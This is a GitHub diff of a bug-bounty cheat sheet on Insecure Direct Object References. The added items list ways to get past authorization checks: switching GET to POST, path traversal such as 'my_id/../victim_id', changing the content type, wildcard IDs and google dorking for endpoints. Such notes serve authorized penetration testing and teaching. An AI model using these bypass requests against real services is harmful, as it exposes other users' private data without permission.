■ ■ ■ ■ ■ ■
Insecure Direct Object References.md
| skipped 113 lines |
| 114 | 114 | | GET /file?id=302 |
| 115 | 115 | | ``` |
| 116 | 116 | | |
| | 117 | + | 12. Change HTTP Method |
| | 118 | + | ``` |
| | 119 | + | GET /api/v1/users/profile/111 |
| | 120 | + | ``` |
| | 121 | + | Try this to bypass |
| | 122 | + | ``` |
| | 123 | + | POST /api/v1/users/profile/111 |
| | 124 | + | ``` |
| | 125 | + | |
| | 126 | + | 13. Path traversal |
| | 127 | + | ``` |
| | 128 | + | GET /api/v1/users/profile/victim_id |
| | 129 | + | ``` |
| | 130 | + | Try this to bypass |
| | 131 | + | ``` |
| | 132 | + | GET /api/v1/users/profile/my_id/../victim_id |
| | 133 | + | ``` |
| | 134 | + | |
| | 135 | + | 14. Change request content type |
| | 136 | + | ``` |
| | 137 | + | Content-type: application/xml |
| | 138 | + | ``` |
| | 139 | + | Try this to bypass |
| | 140 | + | ``` |
| | 141 | + | Content-type: application/json |
| | 142 | + | ``` |
| | 143 | + | |
| | 144 | + | 15. Send wildcard instead of ID |
| | 145 | + | ``` |
| | 146 | + | GET /api/users/111 |
| | 147 | + | ``` |
| | 148 | + | Try this to bypass |
| | 149 | + | ``` |
| | 150 | + | GET /api/users/* |
| | 151 | + | ``` |
| | 152 | + | |
| | 153 | + | 16. Try google dorking to find new endpoint |
| | 154 | + | |
| 117 | 155 | | Reference: |
| 118 | 156 | | - [@swaysThinking](https://twitter.com/swaysThinking) and other medium writeup |
| 119 | 157 | | |
Muhammad Daffa
committed
with
GitHub
3 years ago
1 parent db67aa46